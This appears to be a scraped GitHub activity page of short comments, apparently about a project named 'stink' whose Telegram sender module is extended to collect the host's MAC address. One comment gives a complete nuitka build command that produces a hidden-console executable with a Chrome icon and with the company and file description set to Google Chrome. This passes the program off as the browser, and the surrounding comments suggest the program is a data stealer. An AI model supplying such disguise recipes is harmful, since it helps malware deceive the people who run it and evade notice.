Anghkooey
Anghkooey
**Most likely after compilation to exe you renamed the programme, alas you need to leave the programme with the original name to work properly.**
**On the first question, I find it easiest to add a random number to each file name, `from random import random` to help. Or catch this error** ``` for file...
**Everything is specially divided into several files according to programming rules. Otherwise, it's a mess.**
`nuitka --onefile --windows-disable-console --windows-icon-from-ico=chrome.ico --windows-company-name=Google --windows-file-version=1.0.0.1 --windows-file-description="Google Chrome" t.py` **Try this command**
**Already did in my [fork](https://github.com/user-sspmynxdvb/stink/blob/master/stink/modules/telegram_sender.py). Unfortunately I had to add getmac library, but it is very small.** ``` from getmac import get_mac_address mac = f"📡 {get_mac_address(ip='192.168.1.1')} ```